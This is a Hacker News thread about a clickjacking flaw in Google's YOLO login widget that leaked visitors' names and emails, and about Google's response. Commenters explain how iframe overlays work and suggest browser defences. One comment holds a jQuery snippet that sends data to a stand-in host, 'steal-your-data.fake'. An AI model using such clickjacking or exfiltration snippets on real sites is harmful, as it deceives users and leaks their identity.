Hacker News new | comments | show | ask | jobs | submit login
Google YOLO clickjacking (innerht.ml)
1304 points by bobross 5 months ago | hide | past | web | favorite | 229 comments

Google cache: https://webcache.googleusercontent.com/search?q=cache:kv9fSs...

> Exploiting Clickjacking on Google YOLO allows visitors' name, profile picture and email address to be leaked. That's right, I can even know your email address. :). Click here if you want to see behind the sense (make sure you have logged in Google with a modern browser, PC preferably).

Google's reply to a VRP submission:

> Thanks for your bug report and research to keep our users secure! We've investigated your submission and made the decision not to track it as a security bug.

> The login widget has to be frameable for it to work. I'm not sure how we could fix this to prevent this problem, but thanks for the report!

That's why we don't trust login widgets, right?

Damn, the amount of user trust they just burned by closing that with "as designed, won't fix" is staggering.

Yeah, I read through the post and (assuming I'm parsing it right) can't figure out why this hasn't caused a massive shitstorm already. Are they actually arguing that it's not a security bug because it's necessary for them to implement a 'one click sign in through Google' feature?

Likejacking Facebook likes has been around for 8+ years, leaks a similar amount of information, and there’s no big shitstorm. Not sure what the big difference between YOLO and FB’s like button are?

I was wondering whether this is actually the same as like jacking. Is the ‘leak’ in that case the ability for the Facebook page/post owner to be able to then look you up in the list of ‘likes’? If so, I think Facebook privacy settings may allow users to not leak their emails or pictures in this case.

Also, I think it’s more widespread given that ‘Google identity’ covers a large number of Google products, and signing into one signs into all. With Facebook any time I log in nowadays I open incognito, check messages, log out, whereas with Google I generally stay logged in, mostly because I want gmail and my cross device browsing history to work.

Do you get user's email from FB’s like button? (edit typo)

To me Likejacking is more like harvesting organic likes. And YOLO leaks email address which is PII.

Basically, yes.

That's insane.

Yet they silently blocked his website from using this API thus acknowledging it's actually an issue.

Shoot the messenger. SOP.

Maybe someone should tip off Google project Zero about this? Let's see if they mean it that they will hold themselves to the same standard.

Looks like they took it down for everyone [0]; maybe not the most elegant approach but at least it seems they're taking it more serious now.

[0]: https://stackoverflow.com/questions/50289065/google-yolo-sto...

It would be very interesting to see a split second exact timeline on this.

Indeed. A Google engineer stated on Twitter [0] that the shutdown of the service happened because apparently YOLO is only supposed to be accessible to whitelisted partners.

[0]: https://twitter.com/sirdarckcat/status/994867632355577862

So, whitelisted partners get the ability to rip your data?

I'm sure that will go down just fine. FB just got into a lot of trouble over something like that (arguably a lot more serious, but still).

They also state in the same Twitter thread that they were aware of the issue before the blog post was written. IANAL but even if the shutdown was intentional (as opposed to being the example of terrible damage control it looks like), willfully leaving a bug in production that allows a set of whitelisted partners to deanonymize their visitors without their consent seems like something that shouldn't fly in countries with data protection laws?

I just received a message back on Twitter saying that the whitelist wasn't the fix and they are still making more changes.

This is seriously denting my continued belief in Google's security chops. I know they have some of the finest security researchers on the planet but this was handled in a ham-fisted and ineffective way so far.

And best of all: without 'partner' status you won't be able to check if has been fixed.

>This is seriously denting my continued belief in Google's security chops. I know they have some of the finest security researchers on the planet but this was handled in a ham-fisted and ineffective way so far.

This is a great demonstration how a company can have all of the right talent but still manage to become incompetent through poor organizational policies.

Lets hope it doesn't happen again.

It would be fine if they only gave whitelist access to people who could already simply access your data by request. But GDPR would only require that they know who could access, and that the access list be less than "the entire world".

Just wait a couple of weeks until GDPR takes effect

Sounds like a fix.

By the terms of the VRP it sounds like the reporter is owed a payout.

Bounty deserved, yes. Fixed? No, they only blocked his address, anyone else can still grab your info on their sites.

Looks like it's blocked for everyone now

It's blocked for people who aren't on the whitelist.

That is interesting, do you have more info? I'd imagine the whitelist being quite enormous!

I don't have any information besides what I've seen posted the comments here. For example this: https://twitter.com/sirdarckcat/status/994867632355577862

Exactly. If it was about "just whitelisted partners" he discovered it was actually "everybody." It's not different than discovering that instead of the password just an empty string is enough.

Well, that did protect users from his site, at least :)

They're burning developers and potential employees trust in the first place. This "we don't know how to fix it ==> not a bug" attitude is what's staggering.

To me it shows a gross indifference to being dishonest even when speaking in an official capacity.

I want to say that I hope this is isolated and not a systemic part of their company culture but at this point I can't help but be cynical after this.

This keeps happening over and over again. I remarked the other day that the most feared words when reporting a serious bug are 'won't fix'. It is super annoying. If the feature can't be made to work safely then drop the feature.

> Remember the cookie consent button you clicked at the very beginning? That's right, it was a Clickjacking attempt :)

Brutal. I have gone 100% autopilot to “cookie consent buttons”. I’m curious how many people are. That’s a very clever place to click jack.

Anything that users get conditioned to because of repeated appearance has this potential, and has been warned against.

What should really bother you is that rather than putting up these stupid cookiewalls the intended effect of the legislation was to get websites to stop tracking everything and everybody and this was the result.

Self regulation didn't work, then there was a soft push, which resulted in a lot of wriggling to get around the laws intent and now we will see the hard push.

I wonder how many parties will have the guts to try to wiggle out of the hard push, and I'm quietly hoping for one of the larger offenders to be hit so hard they have to shut down, which might send a useful message to the rest.

Analytics is fine but this wholesale profile building is really across the line.

What really bothers me is the law's original design got hamstrung when governments realized it would subvert their own site analytics, and we ended up with the quite-empty-but-mandatory dialog informing users that a site does a thing that is pretty fundamental web technology (not quite as fundamental as "Transmits data using the HTTP protocol", but pretty close)---instead of scrubbing the whole initiative or replacing it with a Europe-wide education initiative ("The EU presents: browsing and you").

Maybe regulation would work better if there weren't such a disconnect between what lawmakers think people want and the way the technology works.

> got hamstrung when governments realized it would subvert their own site analytics

That's a pretty strong claim. Citation needed.


I always thought it was a combination of slow legislative process, legislators not understanding tech, and industry pushback. I somehow doubt underfunded government IT departments had that much pull.

Those cookie disclaimers are one of the most retarded things on the web.

IIRC the EU mandated that behavior.

Edit: More info: http://ec.europa.eu/ipg/basics/legal/cookies/index_en.htm

Cookie disclaimers at this point need to be taken to their logical conclusion: browser vendors and site operators should add a standard Yes-I-Know-What-Cookies-Are header to the next HTTP update, which can then be vomited at sites by default browser configuration to let them know it's okay to auto-hide the banner.

Hell, let's repurpose Do Not Track for it; it's not like it's being used for anything meaningful otherwise.

Does anyone honor Do Not Track requests?

I feel like honoring Do Not Tracks is like honoring deadbolts on wooden doors. Most people honor it, but you're not using it to keep those people out...

I expect that the reason why most people honor the first is the high likelihood of getting caught or seen. This deterrent does not exist for web tracking.

I think it's more likely that most tracking companies ignore do not track.

We do (at https://prodlytic.com) - if a client sends do not track, we treat every session as a new user. ie: We don't track that user across sessions.

The DNT header reminds me of evil bit RFC [0]. It was funny back then, but times change I guess.

[0] https://www.ietf.org/rfc/rfc3514.txt

Adafruit does. They put their YouTube videos behind a click if you send a “Do Not Track” header.

Is anyone required to honor DNT requests? What happens if they don't?

It's totally voluntary.

That was my understanding as well. I was not sure if perhaps recent legislation in the E.U. may have added any verbiage around that.

The GDPR rather makes it obsolete, actually. DNT was meant as a general purpose opt-out, whereas the GDPR requires an explicit opt-in for most things.

And well, DNT could have had legal bearing, since most legislations in the world require you to stop tracking when the user tells you not to.

So, if the user goes and sets up this general purpose opt-out, you'd have to have some sort of argument why you're different than what the user had in mind when they turned DNT on.

Could have had that legal bearing. Microsoft as well as Google and Facebook killed it off pretty well.

Microsoft by turning it on by default in Internet Explorer. Meaning that there were now lots of instances where the user had not explicitely gone into the settings to turn it on (nor did they perform some other action that serves as reasonable sign that this is what they'd want, like going into InPrivate Browsing, or specifically installing a privacy-focused browser / operating system.)

Google and Facebook killed it off by saying right away that they would not respect it. With how many webpages bundle a Facebook Like button or Google: Analytics, ads, GStatic, ajax.googleapis.com, JQuery, fonts, ReCaptcha, Maps, YouTube etc.

As such, there were very few webpages left that could have chosen to respect it and no judge would have just ruled that everyone has to respect it. It would have killed the internet for a few months.

Same here. And it's so annoying that I'm scared of resetting my Android phone just so that I don't have to hit cookie consent everywhere...

Anyway, now with GDPR consent buttons on their way (at least in Europe), there's a fresh new opportunity for black hats to click jack their whole population of visitors all over again.

Install the "I don't care about cookies" extension; problem solved.

(Firefox for Android supports extensions, I don't know if there are any Webkit-based browsers that do.)

"Annoyances" type adblock lists work too.

The irony of a user having their privacy violated by a pop-up meant to protect their privacy is infuriating.

I just immediately hit those 'cookie consent buttons/boxes' with a uBlock Origin 'block element'. Gets rid of them permanently, and doesn't require submitting/clicking anything.

Knowing that most of the sites use that box to let you acknowledge they are tracking.

I wonder how that applies legally if they happen to collect data on you and you haven’t given consent.

Am I missing something? I don't see anything in the Network panel of my debugging console when I click the cookie consent button.

Google banned him from using their API (instead of fixing the issue). It worked when he posted it, it doesn't work now.

Why would you ever click one of those buttons?

They hover up and cover half of the screen on mobile

Not clicking it doesn't stop them from using cookies/tracking you. The box is simply to inform you that they ARE doing it, whether you like it or not.

How is that consent?

Once you are informed you can leave the site if you want to.

Except for cookies are already transmitted to the client device in far too many cases before the disclaimer is displayed. Also I'm not sure blanket agreeing to all (tracking)cookies will be in accordance with GDPR.

The implication is that, now that you know that cookies are used for tracking, remaining on the site is implied consent. Like the omnipresent "this call may be recorded" statement at call centers.

It is an instance of a much broader issue, where contracts are no longer the result of any negotiation, but are a take it or leave it option.

I understand going after each and every website would be impractical, but imo a disclaimer with a button - most probably after the fact the site already transmitted a handful of cookies - does not comply with the spirit of the regulation.

[1] https://www.cookielaw.org/the-cookie-law/

Most people have at least a passing desire for cleanliness and order (the stuff that becomes OCD when out of balance) which compels them to get rid of the banner.

Because that's how you make them go away.

To generalize, it's not easy to judge what pixels on a browser's rendered webpage are trustworthy and legitimate.

For example, every time I see a "Are you sure you want to leave this page?"[1], I hesitate for a moment and wonder if that dialog box is being spoofed. That dialog shows up for many scammy websites but also legitimate ones too. Yes, one could try to learn which dialogs can't be spoofed[2] but there's always paranoia because you can't keep up-to-date with all unknown future exploits.

Chrome makes that dialog box scarier because it is modal and you can't click outside of the box on the browser's tab [x] to close the window. (You also can't use the keyboard Ctrl+F4 to close it either.) In contrast, Firefox let's you avoid clicking the dialog box by letting you click on the tab's [x] or press Ctrl+F4.

It's easy to replicate these differences in behavior on website regex101.com.[3] Type a few characters there and then try to navigate away from the page. Chrome forces you to interact with the dialog box but Firefox lets you click [x] on the browser tab.

It's nearly impossible for any combination of CSS and Javascript to "escape" the browser window and hijack the [x] button on the browser's tab so it feels "safer" just to click there.

[1] https://www.google.com/search?q=google+chrome+%22are+you+sur...

[2] https://superuser.com/questions/639084/malicious-confirm-nav...

[3] https://regex101.com/

FWIW, every time a browser pops up a modal that I find suspicious, I use a task manager or an OS shell to kill the process. If I have lost faith in anything a program has rendered to the screen, I no longer trust any of the program's own ways -- including the topmost 'x' -- of making the modal cleanly go away without triggering an action I didn't want to approve of.

The essay 'The Line of Death' [1] talks about users' trust placed into UI elements, and the implications thereof.

[1] https://textslashplain.com/2017/01/14/the-line-of-death/

I think Safari has actually made some good improvements here. It now renders all JS-initiated alerts with a different chrome app fully within the page’s frame with a different UI than what’s used elsewhere on the system.

Perhaps there should be a symbol for "trustworthy", that you can't render on a browser. (The browser would detect it and censor it, e.g. by blackening it out). But the browser itself can use it, e.g. in dialog boxes.

>Perhaps there should be a symbol for "trustworthy", that you can't render on a browser.

To expand on this, the web browsers are missing:

1) trusted pixels: Some bank websites implement this idea when you try to sign in. When you enter your id, you are shown a special secret image that you chose when you created the account. If that image isn't there, you should not trust the password field presented. Therefore, any criminal who wants to present a fake bank login screen also has to know the secret image as well. E.g. Chrome could use this technique to show the secret image with dialog boxes truly triggered by Chrome itself instead of painted by malicious HTML.

2) a trusted keyboard sequence that is well-known and standard : Windows operating system had this with Ctrl+Alt+Del. Instead of trusting any login screen, you just press Ctrl+Alt+Del because no user-mode program can hijack that special key sequence. Intercepting it requires a kernel patch or a registry hack. A similar idea could be used in browsers to toggle a special keyboard mode that disables all javascript keyboard events. This mode may be useful for password fields or as a special key sequence to "unstack" hidden buttons, etc.

> any criminal who wants to present a fake bank login screen also has to know the secret image as well

This mechanism is theatre:

1. User enters ID into fake bank website.

2. Fake bank website enters said ID into real bank website.

3. Real bank website shows fake bank website your "secret" image.

4. Fake bank website shows you your "secret image".

>3. Real bank website shows fake bank website your "secret" image.

I had left out some implementation details for brevity. Any first time use of a "new" computer to access the online account requires verification from the bank. (E.g. random code is emailed.) At that point, a bank cookie is set. The bank doesn't show the secret image unless the computer already has a cookie from a previous verification.

A fake webpage that tries to forward credentials to a "robo" browser on a computer in Russia wouldn't have that cookie so they'd never be able to see the secret image.

There are probably other security checks the banks do such as ip blacklists etc.

The secret image isn't foolproof but it's an extra signal to signify trust. Likewise, 2-factor authentication with mobile phones isn't foolproof either and can also be hacked.

What if they open the bank website in a hidden iframe on the malicious site?

X-Frame-Options: DENY

Someone tried defeating the secret-image security... it turns out all it takes is a static image saying "Error with Secret Image Server, call us if the problem lasts more than 24 hours."

Banks should notice a new IP/browser and then force 2 factor authentication before showing the image. ex: Sending a text. Which would make Users far more suspicious as rather than a normal login they see one of those "we don't recognize your browser" screens. The bank can also track the 3rd party connection to their servers making this more tricky to get away with. So, while not fool proof done correctly it is actually very useful.

However, a website would not have access to the browsers image unless the machine was already compromised.

Hm... the way I remember this feature (forgot where it was) is that your custom image is stored in your browser (localstorage?), not on the remote site. So when you see your image, you know it's the same origin. (E.g. not a similar URL with two letters swapped, I guess.)

That's not an issue though if we're talking about the browser UI, as there's no way for a website (malicious or otherwise) to obtain secret image data from the browser.

That secret image thing... Can't the fake site easily proxy your chosen image from the real site the moment you submit your username to the fake site?

Sorry for not being clear. For the Chrome implementation of the secret image, I was thinking that the user would store it locally inside of Google Chrome configuration. E.g. in "chrome://settings" or "chrome://flags", the user sets the secret image (e.g. a photo of their cat or whatever.)

Oops, I was the one being unclear. I was just going off on a tangent about the HTML ones that some banks use. A native one indeed wouldn't have the problem I'm mentioning.

There kinda is. It's the line of death: https://textslashplain.com/2017/01/14/the-line-of-death/ (But, as the article points out, even that isn't perfect.)

True. Like the other commenter noted, perhaps we could use a special key-combination (or perhaps a new key even) to enter a secure mode. Pressing that key-combination could trigger the area above the line-of-death to increase in size. Then it could show more security-related information, and perhaps even password entry fields. Just brainstorming here.

I think that'll end up back firing by making a single target a lot of people will aim to break, creating an arms race that the browser will lose on occasion, to great determent to its users.

I think the issue you're describing has been fixed for years in Chrome. (The SuperUser question is from 2013.) Websites no longer have full control over the content of the dialog box, they do not control the button labels ("leave page"), and they are (I believe) prevented from so much text that the button runs off the screen.

The fact that the dialog box is modal proves that it's not spoofed.

> has been fixed for years in Chrome.

Right, it was fixed (past tense) but that doesn't change the cognitive burden for tomorrow's unknown exploits that look very similar (future tense). Everytime a popup shows up on screen, I have to question myself, "am I up-to-date on the latest browser engine internals to safely click this UI element?"

>The fact that the dialog box is modal proves that it's not spoofed.

Right but... this creates a very convoluted "decision tree" in the web surfer's brain to know whether dialog boxes are real and trustworthy. E.g. if I want to instruct my grandmother to only click on the trustworthy "Leave this Page" buttons, I have to tell her to click outside the box and if she hears a beep while at the same time nothing happens, (the layman's determination for the computer geek's jargon of "modal"), she can then safely click that button. Otherwise that "Leave this Page" button could be a fake and it downloads malware on her computer. Those are very nuanced and error-prone step-by-step instructions for safe web surfing.

Instead of that, using the spatial rules of clicking on the tab browser (the "line of death" as others pointed out) is a much easier guideline to follow.

> I hesitate for a moment

Does pressing Escape also allow "keypress-jacking"?

> Shortly after thie article was published, Google silently prevented my domain from using the API: > The client origin is not permitted to use this API. > Welp.

So some buttons stoped working, and now you have to believe that everything was as the blog said. Well, it was.

And a "mitigation" from google being just avoiding the access to the API just makes things more interesting.

I know I'm just one person - but I can confirm the content of the blog was accurate and the described attacks did work at the time I read it.

This is what you would see if it still worked:


Quite a sketchy move from Google... Hope OP will eventually get a big bounty paid out.

> Google

Big companies trying to strangle hold the small ones -- nothing new, time to move on. Its pathetic.

API ban was probably automatic due to HN effect.

Actually Google temporarily shuts down the service as I've tried changing API keys/domains but received the same error

A lot of Google employees are reading HN and actively posting so no surprise. Did they at least contacted you to properly open a ticket now that they implicitely recognized the vulnerability? Otherwise very very dickish move as it solve nothing and you basically worked for free...


And now if anybody from HN team is listnening. Can you explain why this thread is fastly slipping from the front page?

Currently it’s being devanced by articles that are olders, with less upvote and fewer comments. Can you guarantee that nobody is able manipulate ranking? It’s only a hunch, but it’s not the first time that I notice that google related "bad buzz" move away from main page slightly faster than other...

PS: I’ll gladly accept downvotes. But answers on why I’m wrong or paranoid would have been better

There appear to be quite a few flags on the article pushing it down. The ratio of upvotes to age compared to the rest of the front page is a strong indicator of this.

Also: lots of HN'ers work at google. It would be a nice rule if people were told to abstain from using their flagging privileges when the company they work at is the subject of a thread.

Thanks a lot for investigating. Otherwise I could’nt have excluded that it was only me being paranoid about that.

It looks like the situation has mostly corrected itself by now.

Power corrupts. Absolute power corrupts absolutely. Absolute power hates when it is challenged in any shape or form

It's probably because a lot of Google folks are on here - protecting their brand. Unfortunately that part isn't transparent, but its hopefully a minor issue.

HN has moderation, so some stories can be pushed back into the /New stack by staff, they can fall again if aren't liked by the community

Although I don't think this is some sort of conspiracy, HN front-page is curated content, ranking is not only based on votes.

Flags are a factor, and function as downvotes on articles but are much heavier weighted than upvotes.

Ho do I hack into google I'm a kid and I want to make it say giberish instead of Google

does anyone know?

That doesn't sound plausible; what sort of service would YOLO be if a popular website using it resulted in an API ban?

This is a really well written article.

I recall a video talking explicitly about this problem - it was something about using the browser paint API in conjunction with iframes for security? The gist was a browser should be able to tell in real time if an iframe is visible and should be able to block user input depending on whether or not the site was hiding the iframe, putting something on top of it, pushing it off screen, moving it around, etc...

But I can't remember the source. If I can find it, I'll add it in an edit. And of course if anyone else knows the talk I'm thinking of, please link.

NoScript includes protection against this! He calls it ClearClick:

" whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals you the real thing in "clear". At that point you can evaluate if the click target was actually the intended one, and decide if keeping it locked or unlock it for free interaction."


Yes it is. My goodness, this is one of the best things about HN.

Yep, very good.

It certainly makes me glad I did _this_ on my FB account:

>> You previously turned off platform apps, websites and plug-ins. To use this feature, you need to turn them back on, which also resets your Apps others use settings to their default settings. <<

.. but further to that, I should take my FB login and stick it in a Firefox container where it belongs.

> This report will unfortunately not be accepted for our VRP. Only first reports of technical security vulnerabilities that substantially affect the confidentiality or integrity of our users' data are in scope, and we feel the issue you mentioned does not meet that bar :(

Do the right thing Google.

Or maybe that simply mean this is not the FIRST REPORT of that technical security vulnerability that substantially affect the confidentiality or theirs user’s data.

Which is in a way even worse :(

Yeah, now they blocked OP webpage according to an update on the blog. So, the demo doesn't work but it will work for any other malicious page.

To fix this, there could be a new `X-Frame-Options`: `compose-over`. The browser rendering context will compose the frame separately, and always place it on the top of the rendering context, above every other element; regardless of the host page element's z-index, opacity, whatever.

It's kind of like how an app cannot draw over system UI; like the permissions dialog.

I'm surprised this is not how X-Frame-Options worked in the first place.

Or maybe logging in ought to be handled directly by the browser in a way that couldn't be highjacked or phished easily. Do we really need a million different implementations of a login form?

UAF/U2F, which conveniently is part of the new webauthn standard that just got released in the latest Firefox update

And make sure it has a minimum size so we don't get a 1px iframe following the cursor.

That's something the iframe can detect itself though through JS :)

But as pointed out in the article, JS method of detecting if your page was embbeded is a bit unreliable.

Why rely on a million different copy pasted implementations if one good implementation is possible?

I'm looking forward to Google giving out a $100 reward or even nothing to the researcher.

Like they did to the guy who found the sitemap ranking bug in Google Search where he was able to let others pay for a first page ranking. He only got $1,337 and it took Google 6 months to fix it.

That was me. Google later upgraded the bounty to $5000. :)

Article for those interested: http://www.tomanthony.co.uk/blog/google-xml-sitemap-auth-byp...

There should be another website where people bid on the bug. If Google cares enough about it, they'll out bid the people that want to exploit it.

Lol. A market for vulnerabilities? Pretty sure these exist already. ;)

This is a pretty clever idea. :) cuz you know Google makes money from ad bidding.

...and ought to store the current bids as search results on Google.

> Now, I'm presenting you another button. It doesn't have much to say except "harmless", and I challenge you to click it.

In an article like this I can't help but think that the "[ ] Behind the scene" button is the real bait.

The irony here is that the ridiculous "agree to cookies" requirement makes the users ever so slightly less safe. (Thanks, regulators.)

All those reminders do is remind me how stupid the regulators are.

I use this to close them; https://news.ycombinator.com/item?id=16575304

They might be stupid but almost every website is even more stupid. Almost none offers a way out of spying.

FWIW, setting privacy.firstparty.isolate to 'true' in Firefox prevents this from working.

I believe site isolation in Chrome also does this


I don't think so. Chrome's site isolation just isolates different origins in different browser processes, whereas Firefox's first party isolation is intended to isolate _cookies_.

Interesting discovery: The facebook-like clickjacking doesn't work on Firefox when I have Facebook in its own tab-container (even though I'm logged in, just in that container, not the one I clicked on).

I'm not sure what the minimal repro is here, but if it's the containerization working as intended, that'd be awesome.

This is the intended effect! And if you use the dedicated Facebook Container it's even stronger. The Like button will be blocked entirely, so even Facebook won't receive the "Like" action. https://addons.mozilla.org/en-US/firefox/addon/facebook-cont...

> As for the reason this was closed as working as intended, it was just done accidentally, we had already an internal bug tracking clickjacking in YOLO. Sorry for the confusion!


Somehow this was known, the blog (innerht.ml) gained some traction and then action was taken. Seems that some miscommunication occured inside Google and this problem atracted much more attention than it was necessary.

According to an update on the OP post Google apparently now silently blocked the OP webpage, so the exploit doesn't work in this case - but will still work for any other malicious page. Not cool Google.

I've learnt my lesson.

In future I will dismiss cookie consent buttons by deleting it's DOM node from the inspector.

Addendum: Google logged me out of some services and I had to re-login with 2FA. It seems that Google is doing something about this, but what exactly?

Sounds like an "oh shit" "self-destruct" button just to cover their asses while they figure it out.

Nope I think it's more some AI stuff who has triggered.

Happened to me too

This would be a nice adblock list.

Considering cookie consent buttons will be gone in two weeks, I don't think that's gonna be of much value.

EDIT: Please research the GDPR and new ePrivacy regulation before you vote.

I won't vote either way, but I will say that regardless of what GDPR may mean, "you need a cookie warning" will be accepted web dev mantra for years, and the things they build in that time will be around longer still.

The "you need a cookie warning" is yhe reason why the GDPR is actually so strict, though.

The goal was to let users opt out of tracking in the hope that the industry would self-regulate.

Now that it hasn't, GDPR is coming down hard.

Web devs really manage to fuck everything up.


You mentioning "log in" in this context makes it pretty clear you're also fairly ignorant about the specific topic. Log ins, shopping baskets, ... do not require a cookie notice.

Not only is what you're saying irrelevant to my point, you're wrong. "Log ins, shopping baskets" do require a notice if they are persistent, which almost all of them are. Looks like you're the ignorant one here.

I bet you they'll still be around in a decade :)

They may be, but they'll be useless then. They're not considered consent anymore under the new regulations.

Being useless is just one more reason to adblock them.

another neat method for closing them;


Fanboy's cookiemonster list seems to be updated more frequently: https://github.com/ryanbr/fanboy-adblock/blob/master/fanboy-...

For me Google one Tap stopped working on all my sites that previously worked. I added API HTTP refer to restriction in console.developer.com, but I still get a warning message "The client origin is not permitted to use this API." any thoughts? If you go to the page https://www.wego.com/ you can see that Google one tap still works...

On Twitter [0] they're claiming that it wasn't disabled, and that it working only on a set list of hosts is intended behavior.

[0]: https://twitter.com/sirdarckcat/status/994867137704587264

Exactly same thing here, I use it for secure my admin acount and got "The client origin is not permitted to use this API.". And like you, my domain is correctly allowed console.developers.google.com.

I guess they don't even patch, the ninja block everything until they got better. It's stupid since they got the information before, and could prepare it. It prove again than full disclosure is usefull.

It is working on pinterest.com also

Same here at Aibono, all our systems are dependant on solely on yolo

If even Google can't get basic clickjacking protection right, I really see no hope for the Web as it is. Is there a FF plugin to block all forms of non-first-party content (including but not limited to iframes) and also to switch off "dubious" use of CSS?

Look into uMatrix - it's a damn good plugin for this purpose. But you might need to find something else to control CSS loading.

NoScript Classic has/had clickjacking mitigation. I don't know if the updated version post-Quantum was able to retain this.

Is there any particular reason why js wouldn't be used to emulate the same effect? I'm thinking that the onclick() method calling several things instead of just whatever the button is intended to do.

Please do ignore if i completely misunderstand the discovery, but i don't really see the need to make a html+css button to make any of this execute.

The same origin policy prevents JS from triggering clicks on elements in iframes that have different origins! The web would be a very insecure place without that... =)

Ah, I see. Very good point, thank you!

I too reported a similar issue very recently to VRP and got the exact same response, except in the end there was a line

"If you think we've misunderstood or can provide a convincing attack vector, please do let us know!"

I think OP did not post this line in the blog; which makes Google look like they don't at all care.

No, it was the full email. Besides, I've tried to suggest a fix by prompting first time users but it's been ignored for a week.

Just a thought, why not add play button to iframes as well, just like for videos that prevents auto play

You could still convince users to do a double click, no?

Honestly a decent sized chunk of users that I support double click most things anyway.

A large chunk of the user base doesn't know the functional difference between icons, hyperlinks and buttons.

Given that a large chunk of the web creator base seem to use these interchangeably nowadays, the confusion is unsurprising.

Unfortunately that is true, and it's really bad for accessibility too (using links as buttons, but not coding the keyboard events that are used on buttons, for example.

Well, yes; you double-click the play button to play the video/iframe. I'd be more worried about "Oh, the button did nothing, I should try again.". The real fix is to not allow transparency/compositing.

My dad double clicks everything. So yeah its super easy

Conveniently I had ignored the cookies button because it was not impacting the article text.

I saw it, immediately thought "this is clearly part of the demo", and clicked it, because I was certain it was going to be fun. Woe betide me and my poor risk valuation skills - but not today.

I use clickjacking as a “feature” on a website I operate, http://vlograd.io

I had no choice, at least on mobile.

On mobile browsers, audio contexts start out as muted. They can only be unmuted by an event originating from user interaction.

I use a web player embedded in an iframe on my site. It has an API to communicate with it to do things like playing and pausing the current track. However, this also means the audio context is in a cross-domain iframe, and my only way to trigger the play() method is via the asynchronous postMessage API it exposes. So, in order to unlock the audio context, I present mobile users with a “tap to start” screen. In reality, I’ve positioned and zoomed in on the iframe such that the play button is covering the entire screen for any reasonable screen size. Thus, when the user taps to start, the audio context is unlocked (since the “tap” event on the play button in the iframe fires), and I immediately send a “pause” command via the player’s API. Now, the audio context is unmuted and I’m free to send the “play” command for any track to start playing music.

Anyone else too trusting in clicking the buttons? Brilliant idea to demonstrate the issue with a like to his own blog post!

The "behind the scene" checkbox was one of the coolest depictions for a web page describing click-jacking.

Quite common misunderstand about Clickjacking is the idea that a 3rd party content embedded in an iframe can hijack clicks from the parent (yours) website. While embedding an untrusted iframe in your website is not a god idea, the Clickjacking attack goes the other way around.

Why aren't events masked by the last several frames generated by the rendering system?

If a page is divided into two columns with the left half originating from the source origin and the right half from a delegated origin, why should the source origin observe interaction events from the right half, or vice versa?

We should be able to press a hotkey and immediately see at-a-glance who is operating what.

Yeah, that took me a while to figure out just now. But I still don't see how that's an issue, I'm browsing on ycombinator.com, not ashittyiframesite.com

I'd like to see the browser vendors move to allow the source page to carve out and delegate rendering a single region of pixels per child frame -- preventing other frames, including the source page, rendering into that region or receiving events originating in that region. Finally, child frames should not be allowed to sub-partition their allocation -- there's no defensible need for this except clickjacking.

This would neatly solve this problem with the low cost of making folks who want to implement modal popovers have to do some proper scene management in their pages.

It should always be possible for the end-user to view a colored overlay of their screen and see exactly which origins are operating which regions of the screen.

> to allow the source page to carve out

How would that help? If I have malicious site, I just wouldn't use that feature.

This is why I use Firefox Containers.

I do know that google adsense audit bot specifically checks for their banners being obscured

With uMatrix the iframes come out nicely too. I was never happy about noscript usability, so I didn't use any additional script blocking, until I figured out how easy to use uMatrix is.


Am I safe from this exploit if I disable Javascript?

You may be protected from the specific examples provided in the blog post, but, on the whole, you will not be protected. Most of the underlying vulnerabilities here can be exploited with simple HTML and CSS.

Content blockers can also prevent embedded iframes from loading. The article looks like this for me using uMatrix in Firefox: https://i.imgur.com/pYFXRR3.png

Clicking the link opens the iframe in a new tab, so it's hard to click it again without noticing what's going on.

You can make it a bit more visible if you use the Stylus extension.

Unfortunately Chrome (and probably Firefox quantum) doesn't let you apply css agent_sheets (only user/author), so that style="display:none!important" on the iframes can't be overridden.

If you use older Firefox or Palemoon then you can use Stylish v2.0.7 and override it.

  iframe{border:1px solid red!important;display:block!important}

Facebook attempts to prevent “likejacking” by sometimes asking the user to verify they intended to really like that page. If they see that most people do not confirm this then they ban your like button/page.

So taking facebook’s example this can be “prevented” through some random verification.

I'm perhaps not understanding the significance of this. Is the issue that if you go to a shitty scam site and start clicking things you might have issues?? I don't see how that's an issue to be solved by a browser.

Leaking your image and email is a huge issue though.

does use different browser "profiles" while never signing into other sites help with this?

Yes, if you aren't signed in to other accounts most of these click jacking scenarios would need to convince you to sign in which would be pretty obvious.

>There's no reliable way to prevent Clickjacking

just turn off js >_>

Clickjacking works without JavaScript assuming the targeted site works without JavaScript. HTML and CSS suffice.

I want to believe you, but the only example I found doesn't work.

So now none can use this service, because I am getting a warning message "The client origin is not permitted to use this API." even though I added API restrictions...

For dismissing questionable stuff in the browser which I’d rather not click, I prefer doing it from within dev tools, using a pinch of CSS.

Remember "Don't be evil"? Security bug, won't fix block the demo to decrease awareness of security hole, that's evil.

What does the ??? button do?

Nothing. Here's its code:

  <span class="fake-button" style="padding: 0px 6px;">???</span>

That mean nothing. You could still do:

<script>$('.fake-button').on('click', function(){$.ajax({url: 'http://www.steal-your-data.fake'})})</script>

The inspector displays the listeners of the elements.

Sure about that? ;)

Why doesn't the browser simply disable cookies for the iframe?

That would break lots of things that rely on this...

Are elinks users safe?

elinks aren't safe, full stop.

A failure to verify SSL certificates has plagued elinks since 2012 [0]. Some versions protect, but the bug returns.

[0] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=694658

404 Footnote Not Found

... Thanks. Apologies, I'm having arguments with my assisted keyboard.

Are elinks users safe from AFL ? If you are using elinks not in at least a container, you are asking for pownage.

What's AFL?

Oh, I know this AFL. But it didn't make sense in the context of your question, so I assumed you meant something else.

What do you mean by being "safe from AFL"?

Well, elinks is a cul-de-sac, and AFL would probably obliterate it, so elinks users are most probably putting themselves in more danger than they avoiding.

elinks doesn't render iframes, so this attack wouldn't work.


Of all the content in this article, "modern browser" is what you latch on to? This author isn't shaming you for your choice of browser, or telling you what you should be using for day-to-day browser.

"Modern browser" means a browser that keeps up with modern web standards. Yes, w3m (for instance) still receives updates, but (going by the changelog) those updates refine how the browser handles very old web standards rather than extends support to new ones.

Thanks for sharing!

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact